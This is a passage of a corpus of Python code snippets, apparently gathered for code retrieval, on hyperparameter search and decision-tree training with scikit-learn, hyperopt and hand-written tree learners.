2000]}\n\n rf = RandomForestClassifier()\n rf_random = RandomizedSearchCV(estimator=rf, param_distributions=random_grid, n_iter=250, cv=3, verbose=2, n_jobs=-1)\n rf_random.fit(self.X_train, self.y_train)\n self.results.write(str(rf_random.best_params_) + \"\\n\")", "def 
test_random_forest_max_depth_parameter(params, X_train, X_test, y_train, y_test):", "def optimize_parameters(model, grid, X_train, y_train):\n \n tss = TimeSeriesSplit(n_splits=10)\n \n \n print(\"[INFO] performing random search...\")\n searcher = RandomizedSearchCV(estimator=model, n_jobs=-1, n_iter=10, cv=tss,\n param_distributions=grid, scoring=('neg_mean_squared_error','neg_mean_absolute_error'), refit='neg_mean_squared_error')\n search_results = searcher.fit(X_train, y_train)\n best_params = search_results.best_params_\n print(\"Best parameters are: {}\".format(best_params))\n \n return best_params", "def tune_parameters(self, model, param_set, train, predictor_var, target_var):\n \n grid_search = GridSearchCV(estimator = model, param_grid = param_set,n_jobs=-1, cv=5)\n grid_search.fit(train[predictor_var],train[target_var])\n \n print(grid_search.best_params_, grid_search.best_score_)\n \n return grid_search.best_params_", "def getOptimalParams(self):\n\t\t# Load calibration chain and find optimal for like1\n\t\tcal_data = pd.read_csv(self.database_path, sep=',')\n\t\tparams = cal_data.ix[cal_data['like1'].idxmax()].to_dict()\n\t\tcost = params['like1']\n\t\t# reformat parameters to match original naming\n\t\tparams_reformatted = {}\n\t\tfor k, p in self.cal_params.items():\n\t\t\tparams_reformatted[k] = params['par'+k]\n\n\t\treturn params_reformatted, cost", "def findApproxDepth(train, valid, mD=0, mS=0):\n print(\n \"Building a random set of small trees to geuss the max depth and min set size values\"\n )\n res = []\n tree = DecisionTree(train.randSubSet(120, True))\n r = 10\n s = 3\n if mD != 0:\n s = mD - 1\n r = 1\n for i in range(\n s,\n r + s,\n ):\n depth = i + 1 # depth = randint(2,(len(train[0])-1)*3)\n a = 2\n b = 15\n if mS != 0:\n a = mS\n b = mS + 1\n for min_size in range(a, b, 2):\n # min_size = randint(2,(len(train[0])-1)*2)\n tree.buildTree(depth, min_size, True)\n acc = testTreeF(tree, valid)\n res.append([depth, min_size, acc])\n print(\"%.2f\" % (100 * (i - s + 1) / r), \"percent done\")\n best = max(res, key=lambda r: r[-1])\n # res.sort(key=lambda r: r[-1])\n # for r in res:\n # print(r)\n print(\"found a depth of\", best[0], \"and min size of\", best[1])\n return best", "def get_n_best(self):\n pass", "def test_random_forest_n_estimators_parameter(params, X_train, X_test, y_train, y_test):", "def dec_model(params):\n\n if (params['random']):\n print(\"Random Decision Tree Parameters.\")\n params['criterion'] = random.choice([\"gini\", \"entropy\"])\n params['splitter'] = random.choice([\"best\", \"random\"])\n params['max_features'] = random.choice(['auto', 'sqrt', 'log2', random.randrange(50, 1000, step=25), None])\n params['max_depth'] = random.choice([None, random.randrange(5, 1000, step=5)])\n params['min_samples_split'] = random.choice([2, random.randrange(1, 50, step=1)])\n params['max_leaf_nodes'] = random.choice([None, random.randrange(2, 50, step=1)])\n params['min_samples_leaf'] = random.choice([1, random.randrange(5, 100, step=5)])\n print(params)\n \n model = tree.DecisionTreeClassifier(\n criterion=params['criterion'],\n splitter=params['splitter'],\n max_features=params['max_features'],\n max_depth=params['max_depth'],\n min_samples_split=params['min_samples_split'],\n max_leaf_nodes=params['max_leaf_nodes'],\n min_samples_leaf=params['min_samples_leaf']\n )\n\n return model", "def parameter_optimize(self, estimator, parameters, X_test, y_test):\n cv = cross_validation.ShuffleSplit(self.X.shape[0], n_iter=100,\n test_size=0.3, random_state=42)\n 
clf = grid_search.GridSearchCV(estimator, parameters[1], cv = cv, n_jobs =4)\n t1 = time.time()\n clf.fit(self.X, self.y)\n print \"The optimize parameters for %s is: %s\"%(parameters[0], clf.best_params_)\n y_pred = clf.predict(X_test)\n t2 = time.time()\n print \"The running time for %s is: %f sec\"%(parameters[0], t2 - t1)\n score = metrics.accuracy_score(y_test, y_pred)\n print \"The accuracy score for %s is: %f\"%(parameters[0], score), \"\\n\"\n return {\"%s\"%parameters[0]: {\"estimator_parameters\": clf.best_params_, \n \"running_time\": t2-t1, \"accuracy_score\": score}}", "def best_params(self):\n return self.X[np.argmax(self.y.numpy())]", "def optimize(self, best_func):\n nb_clf = Pipeline(steps=[('vect', TfidfVectorizer()), ('clf', best_func)])\n parameters = {\n 'vect__stop_words': [None, 'english'],\n }\n gs_clf = GridSearchCV(nb_clf, parameters, scoring='accuracy')\n gs_clf = gs_clf.fit(self.train.text, self.train.gender)\n print(\"Best parameters: \" + str(gs_clf.best_params_))\n print('Best score: ' + str(gs_clf.best_score_))\n print('=' * 80)\n return gs_clf.best_params_", "def tree_optimize(mvp_tree,coefs=None):\n if not coefs:\n coefs = [1,1,1]\n # TODO", "def __build_tree__(self, features, classes, depth=0):\n\n # TODO: finish this.\n root = None\n if (len(set(classes)) <= 1) and (len(classes) != 0) :\n return DecisionNode(None,None,None,classes[0])\n elif (len(classes) == 0):\n return DecisionNode(None,None,None,2)\n elif depth == self.depth_limit:\n return DecisionNode(None,None,None,max(set(classes), key=list(classes).count))\n else:\n# if depth == 0:\n features = np.array(features)\n classes = np.array(classes).reshape(-1,1)\n feat_shape = features.shape\n sample_list = range(feat_shape[0])\n gains = np.zeros((feat_shape[1]))\n indices = np.zeros((feat_shape[1]))\n for i in range(feat_shape[1]):\n attribute = features[:,i]\n for j in range(20):\n split_indx = int(np.random.choice(sample_list, replace=False))\n idx_above = np.where(attribute > attribute[split_indx])[0]\n idx_below = np.where(attribute < attribute[split_indx])[0]\n classes_below = classes[idx_below,:].reshape(1,-1)[0]\n classes_above = classes[idx_above,:].reshape(1,-1)[0]\n gain = gini_gain(list(classes.reshape(1,-1)[0]),[list(classes_below),list(classes_above)])\n if gain > gains[i]:\n gains[i] = gain\n indices[i] = split_indx\n indx = np.argmax(gains)\n split_indx = int(indices[indx])\n attribute = features[:,indx]\n idx_above = np.where(attribute > attribute[split_indx])[0]\n idx_below = np.where(attribute < attribute[split_indx])[0] \n features_below = features[idx_below,:]\n features_above = features[idx_above,:]\n classes_below = classes[idx_below,:].reshape(1,-1)[0]\n classes_above = classes[idx_above,:].reshape(1,-1)[0]\n if (len(classes_below) != 0) and (len(classes_above) != 0):\n root = DecisionNode(None,None,lambda feat:feat[indx] > features[split_indx,indx])\n root.left = self.__build_tree__(features_above, classes_above, depth+1)\n root.right = self.__build_tree__(features_below, classes_below, depth+1)\n return root\n elif (len(classes_below) == 0) and (len(classes_above) != 0):\n return DecisionNode(None,None,None,max(set(classes_above), key=list(classes_above).count))\n elif (len(classes_above) == 0) and (len(classes_below) !=0):\n return DecisionNode(None,None,None,max(set(classes_below), key=list(classes_below).count))\n else:\n return DecisionNode(None,None,None,2)", "def greedy_learn_search(self,db,labels):\n queue = PriorityQueue()\n dolowmem = (self.lowmem == True)\n numidsets 
= 0\n root_ids = range(len(labels))\n queue.push((self.root,root_ids),len(labels))\n numnodes = 1\n deepest = 0\n err = 0\n while len(queue) > 0 and numnodes+2 <= self.maxnodes:\n #print \"%d nodes, priority %d\"%(numnodes,queue.nextkey())\n nerr = queue.nextkey()\n (node,trainingset) = queue.pop()\n #print \"Greedy learn\",len(trainingset)\n if trainingset is None:\n trainingset = self.identify_examples(db,labels,node)\n if node.depth >= self.maxdepth or len(trainingset) <= self.minexamples:\n #print \" Hit depth or training set limit\"\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n continue\n features = self.feature_subset(node,db,labels,trainingset)\n cost = node.pick_best_split(db,labels,trainingset,features)\n numidsets -= len(trainingset)\n #do a split\n if node.type == 'v':\n continue\n elif node.type == 's':\n #discrete split\n node.children = dict()\n #select sub-indices\n Eids = defaultdict(list)\n noneids = []\n for id in trainingset:\n v = db[node.feature,id]\n if v is None:\n #item doesn't exist, it's a missing value\n noneids.append(id)\n else:\n Eids[v].append(id)\n #determine whether to switch to low-memory mode\n if not dolowmem and self.lowmem=='auto':\n for v,vids in Eids.iteritems():\n numidsets += len(vids)+len(noneids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n dolowmem = True\n trainingset = None\n\n\n numnodes += len(Eids)\n #print \"Split sizes\",[len(v) for v in Eids.itervalues()]\n #print \"None size\",len(noneids)\n for v,vids in Eids.iteritems():\n #print \"->\",len(vids),\"+\",len(noneids)\n #recurse\n c = DecisionTreeNode(node)\n node.children[v] = c\n err = misclassification_error([labels[id] for id in vids+noneids])\n cids = (None if dolowmem else vids+noneids)\n queue.push((c,cids),err)\n if c.depth > deepest:\n deepest = c.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n else:\n #do an inequality split\n assert node.type == 'i',\"Got a weird type? \"+str(node.type)\n leftids = []\n rightids = []\n for id in trainingset:\n val = db[node.feature,id]\n if val is not None:\n if val <= node.value: leftids.append(id)\n else: rightids.append(id)\n else:\n leftids.append(id)\n rightids.append(id)\n if len(leftids)==0 or len(rightids)==0:\n print \"node feature \"+str(node.feature)+\" doesn't have a valid split value \"+str(node.value)\n vals = [db[node.feature,id] for id in trainingset if db[node.feature,id]!=None]\n print \"min,max of training set:\",min(vals),max(vals)\n print \"cost is\",cost\n raw_input()\n assert len(leftids) > 0 and len(rightids) > 0\n if not dolowmem and self.lowmem=='auto':\n numidsets += len(leftids) + len(rightids)\n if numidsets > self.lowmem_threshold:\n print \"Decision tree learner switching to low-memory mode\"\n dolowmem = True\n trainingset = None\n numnodes += 2\n c1 = DecisionTreeNode(node)\n c2 = DecisionTreeNode(node)\n node.children = {0:c1,1:c2}\n #print \"->\",len(leftids)\n #print \"->\",len(rightids)\n err1 = misclassification_error([labels[id] for id in leftids])\n err2 = misclassification_error([labels[id] for id in rightids])\n if dolowmem:\n leftids = None\n rightids = None\n queue.push((c1,leftids),err1)\n queue.push((c2,rightids),err2)\n if c1.depth > deepest:\n deepest = c1.depth\n print \"Decision tree learner: Reached node with depth\",deepest\n #end of recursion. 
for the rest of the nodes still in the queue, make them leaf nodes\n if len(queue) > 0:\n print \"%d nodes remaining in queue, setting to leaves\"%(len(queue),)\n for (node,trainingset) in queue:\n node.pick_best_label(db,labels,trainingset)\n err += misclassification_error([labels[id] for id in trainingset])\n return err", "def _get_best_ratios(self, context):\n _logger.info('_get_best_ratios')\n pruned_params = []\n for param in context.eval_graph.all_parameters():\n if re.match(self.pruned_params, param.name()):\n pruned_params.append(param.name())\n\n min_ratio = 0.\n max_ratio = 1.\n\n flops = context.eval_graph.flops()\n model_size = context.eval_graph.numel_params()\n\n while min_ratio < max_ratio:\n ratio = (max_ratio + min_ratio) / 2\n _logger.debug(\n '-----------Try pruning ratio: {:.2f}-----------'.format(ratio))\n ratios = [ratio] * len(pruned_params)\n param_shape_backup = {}\n self._prune_parameters(\n context.eval_graph,\n context.scope,\n pruned_params,\n ratios,\n context.place,\n only_graph=True,\n param_shape_backup=param_shape_backup)\n\n pruned_flops = 1 - (float(context.eval_graph.flops()) / flops)\n pruned_size = 1 - (float(context.eval_graph.numel_params()) /\n model_size)\n _logger.debug('Pruned flops: {:.2f}'.format(pruned_flops))\n _logger.debug('Pruned model size: {:.2f}'.format(pruned_size))\n for param in param_shape_backup.keys():\n context.eval_graph.var(param).set_shape(param_shape_backup[\n param])\n\n if abs(pruned_flops - self.target_ratio) < 1e-2:\n break\n if pruned_flops > self.target_ratio:\n max_ratio = ratio\n else:\n min_ratio = ratio\n _logger.info('Get ratios: {}'.format([round(r, 2) for r in ratios]))\n return pruned_params, ratios", "def optimize(\n # trials,\n random_state=SEED):\n\n space = {\n 'max_depth': scope.int(hp.uniform('max_depth', 5, 15)),\n 'subsample': hp.uniform('subsample', 0.03, 1),\n 'learning_rate' : hp.loguniform('learning_rate', np.log(0.005), np.log(0.5)) - 0.0001,\n 'colsample_bytree': hp.uniform('colsample_bytree', 0.3, 1),\n 'reg_alpha': hp.loguniform('reg_alpha', np.log(0.005), np.log(5)) - 0.0001,\n 'reg_lambda': hp.loguniform('reg_lambda', np.log(1), np.log(5)),\n 'bagging_freq': hp.choice('bagging_freq', [0, 1]),\n 'num_leaves': scope.int(hp.uniform('num_leaves', 10, 128)),\n 'n_estimators': 1000,\n 'boosting': 'gbdt',\n 'objective': 'multiclass',\n 'num_class': 12,\n 'metric': 'None',\n 'is_unbalance': 'true',\n # 'min_data_per_group': 1000,\n 'verbose': -1,\n 'random_seed': 42,\n \n }\n\n # Use the fmin function from Hyperopt to find the best hyperparameters\n best = fmin(score_model, space, algo=tpe.suggest,\n # trials=trials,\n max_evals=hyperopt_niters)\n return best", "def GetPts(self):\n return self.best", "def findBestModel(X_train, X_test, Y_test, model='iForest'):\n if model == 'iForest':\n total_score = 0;\n parameters = [0,0,0,0]\n for max_features in range(1,X_train.shape[1]+1):\n for contamination in range(1,101):\n iForest = IsolationForest(n_estimators = 100, max_features = max_features, contamination = contamination/1000, random_state = 0).fit(X_train)\n \n scores = []\n for x_test,y_test in zip(X_test,Y_test):\n y_hat = iForest.predict(x_test)\n score = evaluate(y_test,y_hat) # returns similarity percentage\n scores.append(score)\n \n if sum(scores) > total_score:\n total_score = sum(scores)\n parameters[0] = max_features\n parameters[1] = contamination/1000\n parameters[2] = total_score\n parameters[3] = scores\n print(parameters, contamination)\n \n return parameters", "def 
optimize_hyper_parameters(data, predictor, cv_fold, verbose=0):\n # Hyper parameters to explore\n hyper = predictor.hyper_parameters_grid\n regs = list(ParameterGrid(hyper))\n if len(regs) == 0:\n return {}\n if len(regs) == 1:\n return regs[0]\n\n # Optimization\n if verbose:\n print(\"Optimizing...\")\n scores = []\n if cv_fold > 1:\n skf = StratifiedKFold(n_splits=cv_fold, shuffle=True, random_state=SEED)\n\n n_param = 0\n for reg in regs:\n n_param += 1\n if verbose > 1:\n print(\"Optimizing parameter {0} out of {1}...\".format(n_param, len(regs)))\n predictor.set_hyper_parameters(hyper_parameters=reg)\n scores_per_reg = []\n\n # splitting\n if cv_fold > 1:\n for train_idx, test_idx in skf.split(data['x_train'], data['y_train']):\n # Split training data in train and dev (called test as it's more convenient)\n new_data = {'x_train': data['x_train'][train_idx], 'x_test': data['x_train'][test_idx],\n 'y_train': data['y_train'][train_idx], 'y_test': data['y_train'][test_idx]}\n\n # Train classifier\n predictor.fit(new_data)\n score = predictor.score(new_data)\n scores_per_reg.append(score)\n\n else:\n predictor.fit(data) # No cv so we fit on the whole data and we keep the best hyper params\n score = predictor.score(data)\n scores_per_reg.append(score)\n\n # We only keep the mean:\n scores.append(np.mean(scores_per_reg))\n if verbose > 1:\n print(\"Parameters {0} yielded a score of {1}.\".format(reg, scores[-1]))\n\n best = np.argmax(scores) # To find the hyper parameter that yielded the best score on average.\n return regs[best]", "def train_decision_tree():\n train_model(DecisionTreeRegressor(max_depth=3, random_state=42),\n dataset_file_name=DECISION_TREE_DEFAULT_DATASET,\n model_file_name=DECISION_TREE_DEFAULT_MODEL)", "def select_best_model(self, df):\n params = {\n # check whether unigrams give good results or bigrams.\n \"vectorizer__vectorizer\": [self.feature_name_to_class[self.feature]],\n \"vectorizer__ngram_range\": [(1,1), (1,2), (2,2)],\n # check pca parameters\n \"pca__n_components\": [30, 40, 50],\n # stemmer to use for preprocessing\n \"preprocessor__stemmer\": [self.stemmer_name_to_method[self.stemmer_method]],\n 'extractor__punctuations': [True, False]\n\n }\n # select the tunable parameters according to the model\n if self.model == MODELS_SVM:\n params.update({\n 'model__kernel': ['linear'],\n 'model__gamma': [1e-3, 1e-4],\n 'model__C': [0.5, 1, 10]\n })\n elif self.model == MODELS_RANDOM_FOREST:\n params.update({\n 'model__n_estimators': [5, 10, 15]\n })\n elif self.model == MODELS_LOGISTIC_REGRESSION:\n params.update({\n 'model__C': [1.0, 10],\n 'model__tol': [0.001, 0.01, 0.1]\n })\n clf = GridSearchCV(self.get_pipeline(), params, cv=5,\n scoring='%s_macro' % self.training_param)\n X = df.drop([\"Value\"], axis=1)\n Y = df[\"Value\"].values\n clf.fit(X, Y)\n print clf.best_params_\n # print clf.best_estimator_\n print clf.best_score_", "def _get_learned_parameters(nodes, edges, observations):\n parameters = {}\n\n \"\"\" YOUR CODE HERE \"\"\"\n for node in nodes:\n parent_nodes = []\n for edge in edges:\n if node == edge[1]:\n parent_nodes.append(edge[0])\n output = np.array(observations[node])\n inputs = []\n for p_node in parent_nodes:\n inputs.append(observations[p_node])\n if inputs!=[]:\n inputs = np.array(inputs).T\n else:\n inputs = None\n weights = _learn_node_parameter_w(output, inputs)\n variance = _learn_node_parameter_var(output, weights, inputs)\n parameters[node] = {}\n parameters[node][\"variance\"] = variance\n parameters[node][\"bias\"] = weights[0]\n 
for p_node_index in range(len(parent_nodes)):\n parameters[node][parent_nodes[p_node_index]] = weights[p_node_index+1]\n \"\"\" END YOUR CODE HERE \"\"\"\n\n return parameters", "def greedy_learn(self,node,db,labels,ids):\n if node.depth >= self.maxdepth or len(ids) <= self.minexamples:\n #terminate recursion\n node.pick_best_label(db,labels,ids)\n err = misclassification_error([labels[id] for id in ids])\n if err > 0:\n print \"Reached a leaf and had to make some sacrifices, cost\",err\n print \" depth\",node.depth\n print \" labels\",[labels[id] for id in ids]\n return err\n\n features = self.feature_subset(node,db,labels,ids)\n cost = node.pick_best_split(db,labels,ids,features)\n \n #do a split\n if node.type == 'v':\n #base case: no misclassifications\n \"\"\"\n if cost>0:\n print \"greedy_learn: Warning, pick_best_split indicates a leaf but the cost is nonzero\"\n print \"cost=\",cost,\"misclassification=\",misclassification_error([labels[id] for id in ids])\n print \"# of ids:\",len(ids)\n for i in ids:\n print \"id\",i,\",\",\n for k in range(db.numFeatures()):\n if db[k,i] != None:\n print k,\"=\",db[k,i],\",\",\n print \"label\",labels[i]\n raw_input()\n \"\"\"\n return 0\n elif node.type == 's':\n #print \"Picked feature\",node.feature,\"split\"\n #do a discrete split\n node.children = dict()\n #select sub-indices\n Eids = defaultdict(list)\n noneids = []\n for id in ids:\n v = db[node.feature,id]\n if v is None:\n #item doesn't exist, it's a missing value\n noneids.append(id)\n else:\n Eids[v].append(id)\n #print \" split sizes:\",[len(x) for x in Eids.values()]\n #print \" None ids:\",len(noneids)\n ids = None\n errors = 0\n for v,vids in Eids.iteritems():\n #recurse\n c = DecisionTreeNode(node)\n #print \"Recursing on value\",v\n #print \" ids:\",vids\n errors += self.greedy_learn(c,db,labels,vids+noneids)\n node.children[v] = c\n if c.depth > self.deepest:\n self.deepest = c.depth\n print \"Decision tree learner: Reached node with depth\",self.deepest\n return errors\n else:\n #do an inequality split\n assert node.type == 'i'\n #print \"Picked feature\",node.feature,\"inequality value\",node.value,\"cost\",cost\n leftids = []\n rightids = []\n for id in ids:\n if db[node.feature,id] is not None:\n if db[node.feature,id] <= node.value: leftids.append(id)\n else: rightids.append(id)\n else:\n leftids.append(id)\n rightids.append(id)\n if len(rightids) == len(ids) or len(leftids) == len(ids):\n #due to missing values, this split is useless\n errors = misclassification_error([labels[id] for id in ids])\n print \"useless split on feature\",node.feature,\"value\",node.value,\"misclassification error\",errors\n print \"Left size\",len(leftids),\"right size\",len(rightids)\n raw_input()\n node.pick_best_label(db,labels,ids)\n return errors\n #clear memory associated with ids list\n del ids[:]\n ids = None\n #print \"Left size\",len(leftids),\"right size\",len(rightids)\n c1 = DecisionTreeNode(node)\n c2 = DecisionTreeNode(node)\n #left side\n errors = self.greedy_learn(c1,db,labels,leftids)\n #right side\n errors += self.greedy_learn(c2,db,labels,rightids)\n #restore index\n node.children = {0:c1,1:c2}\n if c1.depth > self.deepest:\n self.deepest = c1.depth\n print \"Decision tree learner: Reached node with depth\",self.deepest\n return errors", "def find_optimal_depth(x_train, x_test, y_train, y_test):\n # declare variables\n max_depths = np.linspace(1, 15, 15, endpoint=True)\n train_results = []\n test_results = []\n # iterate over the different depths\n for depth in max_depths:\n 
trees = DecisionTreeClassifier(criterion='entropy', max_depth=depth)\n trees.fit(x_train, y_train)\n\n # Add auc score to train list\n train_pred = trees.predict(x_train)\n fpr, tpr, thresholds = roc_curve(y_train, train_pred)\n roc_auc = auc(fpr, tpr)\n train_results.append(roc_auc)\n\n # Add auc score to test list\n test_pred = trees.predict(x_test)\n fpr, tpr, thresholds = roc_curve(y_test, test_pred)\n roc_auc = auc(fpr, tpr)\n test_results.append(roc_auc)\n\n plt.figure(figsize=(8, 5))\n plt.plot(max_depths, train_results, 'b', label='Train AUC')\n plt.plot(max_depths, test_results, 'r', label='Test AUC')\n plt.ylabel('AUC score', fontsize=16)\n plt.xlabel('Tree depth', fontsize=16)\n plt.legend()\n plt.show()\n return", "def get_params(self, deep=True):\n return super()._get_params('estimators', deep=deep)", "def cross_validation(self, x, t, k=5):\n print(\"Cross validation of the Decision Tree Classifier...\")\n bestCriteria = ''\n bestMax_depth= 2\n bestError = float('inf')\n\n N = len(x)\n N_train = math.floor(0.8 * N)\n\n dicCriteria = ['gini', 'entropy']\n min_depth = 2\n max_depth = 40\n\n for crit in dicCriteria:\n for d in range(min_depth, max_depth):\n errors = np.zeros(k)\n\n for j in range(k):\n map_index = list(zip(x, t))\n random.shuffle(map_index)\n random_X, random_t = zip(*map_index)\n\n train_x = random_X[:N_train]\n valid_x = random_X[N_train:]\n train_t = random_t[:N_train]\n valid_t = random_t[N_train:]\n\n self.model = tree.DecisionTreeClassifier(max_depth=d, criterion=crit)\n self.train(train_x, train_t)\n error_valid = np.array([self.error(x_n, t_n)\n for t_n, x_n in zip(valid_t, valid_x)])\n errors[j] = error_valid.mean()\n\n mean_error = np.mean(errors)\n if mean_error < bestError:\n bestError = mean_error\n bestCriteria = crit\n bestMax_depth = d\n print(\"The new best hyper parameters are : \", bestMax_depth, bestCriteria)\n\n print(\"Best hyper parameters are : \", bestMax_depth, bestCriteria)\n print(\"Validation error : \", 100 * bestError, \"%\")\n self.model = tree.DecisionTreeClassifier(max_depth=bestMax_depth, criterion=bestCriteria)\n self.train(x, t)", "def decision_tree(df, variables, test_size):\n from sklearn.model_selection import train_test_split\n from sklearn import tree\n\n # Define input\n X = encoding_df(df, variables)\n\n # Set validation\n y = df['target']\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=42)\n\n clf = tree.DecisionTreeRegressor()\n clf = clf.fit(X_train, y_train)\n\n print(compute_rmse(y_test, clf.predict(X_test)))\n return clf.predict(X_test), y_test", "def __init__(self, max_depth=None, criterion='gini', random_state=0):\n print(\"Initialize the model Decision Tree Classifier... 
\")\n self.random_state = random_state\n self.model = tree.DecisionTreeClassifier(max_depth=max_depth, criterion=criterion, random_state=random_state)", "def getPredictions(self):\n\t\tself.bestLabel = self.testingProbs.apply(lambda x: x.argmax(),1)", "def decision_tree(df, dt_dict, curr_node,\r\n prev_attr = None, align_dir = None,\r\n depth = -1, no_data = False,\r\n ensemble = None):\r\n \r\n class_count = get_class_count(df)\r\n # get the class label counts for the given dataframe\r\n leaf_node_bool = check_leaf_node(df)\r\n # this function helps to check if we have a leaf node\r\n if leaf_node_bool:\r\n # if its leaf node\r\n curr_node[align_dir] = df['class'].values[0]\r\n # assign the leaf node value\r\n elif no_data:\r\n # if we are out of data points\r\n class_counts = df['class'].value_counts()\r\n # get the class counts\r\n curr_node[align_dir] = np.argmax(class_counts)\r\n # assign the majority class of prev node\r\n else:\r\n entropy_values_series = impurity.entropy_calc(df, ensemble = ensemble)\r\n # calculate the entropy values for each feature\r\n info_gain_dict = {}\r\n # empty dict for information gain\r\n for feature in entropy_values_series.index:\r\n # iterate over each features\r\n impurity.information_gain_calc(df, feature, info_gain_dict)\r\n # function call for information gain calculation\r\n for f in entropy_values_series.index:\r\n # iterate over each feature\r\n information_gain = entropy_values_series[f] - info_gain_dict[f][1]\r\n # calculation of information gain\r\n info_gain_dict[f] = (info_gain_dict[f][0], information_gain)\r\n # update the information gain dict\r\n best_feature = sorted(info_gain_dict, key = lambda x: info_gain_dict[x][1])[-1]\r\n # get the best feature on which to be splitted.\r\n #print(best_feature)\r\n node_value = (best_feature, info_gain_dict[best_feature], class_count[0],\r\n class_count[1])\r\n # get the node value\r\n \r\n if not leaf_node_bool and align_dir:\r\n # growing the tree\r\n if depth == 0:\r\n if node_value[2] > node_value[3]:\r\n node_value = 0\r\n else:\r\n node_value = 1\r\n curr_node[align_dir] = node_value\r\n return 0\r\n else:\r\n curr_node[align_dir] = {node_value:{}}\r\n curr_node = curr_node[align_dir][node_value]\r\n else:\r\n dt_dict[node_value] = {}\r\n curr_node = dt_dict[node_value]\r\n \r\n data_split(df, best_feature, info_gain_dict, \r\n dt_dict, curr_node, depth)\r\n # function call for data split\r", "def test_find_best_model(self):\n parameters = dict(\n model=('spherical', 'gaussian', 'exponential', 'matern')\n )\n gs = GridSearchCV(\n VariogramEstimator(n_lags=15, normalize=False),\n parameters,\n cv=3\n )\n\n gs = gs.fit(self.c, self.v)\n\n # Python 3.6 yields 'exponential', \n # while 3.7, 3.8 yield 'gaussian' - this is so stupid\n self.assertTrue(gs.best_params_['model'] in ['gaussian', 'exponential'])", "def extractBestAlgorithms(args = algs2009, f_factor=2,\n target_lb=1e-8, target_ub=1e22):\n\n # TODO: use pproc.TargetValues class as input target values\n # default target values:\n targets = pproc.TargetValues(\n 10**np.arange(np.log10(max((1e-8, target_lb))),\n np.log10(target_ub) + 1e-9, 0.2))\n # there should be a simpler way to express this to become the\n # interface of this function\n\n print 'Loading algorithm data from given algorithm list...\\n' \n\n verbose = True\n dsList, sortedAlgs, dictAlg = pproc.processInputArgs(args, verbose=verbose)\n\n print 'This may take a while (depending on the number of algorithms)'\n\n selectedAlgsPerProblem = {}\n for f, i in 
pproc.dictAlgByFun(dictAlg).iteritems():\n for d, j in pproc.dictAlgByDim(i).iteritems():\n selectedAlgsPerProblemDF = []\n best = BestAlgSet(j)\n \n for i in range(0, len(best.target)):\n t = best.target[i]\n # if ((t <= target_ub) and (t >= target_lb)):\n if toolsstats.in_approximately(t,\n targets((f, d), discretize=True)):\n # add best for this target:\n selectedAlgsPerProblemDF.append(best.algs[i])\n \n # add second best or all algorithms that have an ERT\n # within a factor of f_factor of the best:\n secondbest_ERT = np.infty\n secondbest_str = ''\n secondbest_included = False \n for astring in j:\n currdictalg = dictAlg[astring].dictByDim()\n if currdictalg.has_key(d):\n curralgdata = currdictalg[d][f-1] \n currERT = curralgdata.detERT([t])[0]\n if (astring != best.algs[i]):\n if (currERT < secondbest_ERT):\n secondbest_ERT = currERT\n secondbest_str = astring\n if (currERT <= best.detERT([t])[0] * f_factor):\n selectedAlgsPerProblemDF.append(astring)\n secondbest_included = True\n if not (secondbest_included) and (secondbest_str != ''):\n selectedAlgsPerProblemDF.append(secondbest_str)\n \n if len(selectedAlgsPerProblemDF) > 0:\n selectedAlgsPerProblem[(d, f)] = selectedAlgsPerProblemDF\n \n print 'pre-processing of function', f, 'done.' \n \n print 'loading of best algorithm(s) data done.'\n \n countsperalgorithm = {}\n for (d, f) in selectedAlgsPerProblem:\n print 'dimension:', d, ', function:', f\n setofalgs = set(selectedAlgsPerProblem[d,f])\n \n # now count how often algorithm a is best for the extracted targets\n for a in setofalgs:\n # use setdefault to initialize with zero if a entry not existant:\n countsperalgorithm.setdefault((d, a), 0) \n countsperalgorithm[(d,a)] += selectedAlgsPerProblem[d,f].count(a)\n \n selectedalgsperdimension = {}\n for (d,a) in sorted(countsperalgorithm):\n if not selectedalgsperdimension.has_key(d):\n selectedalgsperdimension[d] = []\n selectedalgsperdimension[d].append((countsperalgorithm[(d,a)], a))\n \n for d in sorted(selectedalgsperdimension):\n print d, 'D:'\n for (count, alg) in sorted(selectedalgsperdimension[d], reverse=True):\n print count, alg\n print '\\n'\n \n \n print \" done.\"\n \n return selectedalgsperdimension", "def get_best_hyper_parameters(self, estimator, parameters: dict,\n search_method='GridSearchCV', cv=5,\n scoring='r2', n_jobs=-1, verbose=0):\n self.log(f\"{self.cur_file_path}\\t\\tInfo: train method invoked!\")\n\n if search_method == 'RandomizedSearchCV':\n search_cv = RandomizedSearchCV(\n estimator=estimator,\n param_distributions=parameters,\n cv=cv,\n scoring=scoring,\n n_jobs=n_jobs,\n verbose=verbose)\n else:\n search_cv = GridSearchCV(\n estimator=estimator,\n param_grid=parameters,\n cv=cv,\n scoring=scoring,\n n_jobs=n_jobs,\n verbose=verbose)\n\n search_cv.fit(self.trainX, self.trainY)\n return search_cv.best_params_", "def build_tree(self, rows, attribute_list, depth=1, parent_rows=None):\n if len(rows) == 0:\n if parent_rows is not None:\n label_map = DecisionTree.get_count_by_attribute_value(parent_rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n else:\n raise ValueError(\"Reached a decision node which had zero rows but was not\"\n \"provided with a parent node\")\n if self.max_depth is not None and depth == self.max_depth:\n label_map = DecisionTree.get_count_by_attribute_value(rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n\n try:\n splitting_func = 
